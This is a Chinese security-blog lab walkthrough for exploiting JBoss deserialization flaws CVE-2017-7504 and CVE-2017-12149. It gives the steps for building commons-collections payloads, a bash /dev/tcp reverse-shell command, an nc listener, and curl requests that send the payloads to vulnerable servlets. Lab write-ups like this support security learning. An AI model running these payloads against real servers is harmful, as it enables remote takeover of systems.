freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

vulnhub--jboss
baiyexing8 2022-10-14 12:01:57 150598
所属地 湖南省
CVE-2017-7504 反序列化

访问/jbossmq-httpil/HTTPServerILServlet,出现如下页面证明存在该漏洞

编译并生成序列化文件

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

生成带有序列化恶意数据的ser文件

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.103.134/4444 0>&1"

开启nc监听

向靶机发送攻击payload

curl http://192.168.103.134:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

成功反弹

CVE-2017-12149 反序列化

验证漏洞:访问/invoker/readonly,状态码为500,说明存在该漏洞

编译并生成序列化文件

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

生成带有序列化恶意数据的ser文件

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.103.227:4444

nc监听端口

nc -lvnp 4444

向靶机发送攻击payload

curl http://192.168.103.134:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

成功反弹

# 漏洞 # 网络安全 # web安全
本文为 baiyexing8 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
baiyexing8 LV.2
这家伙太懒了,还未填写个人描述!
  • 3 文章数
  • 1 关注者
vulnhub-shiro
2022-10-14
vulnhub--weblogic
2022-10-11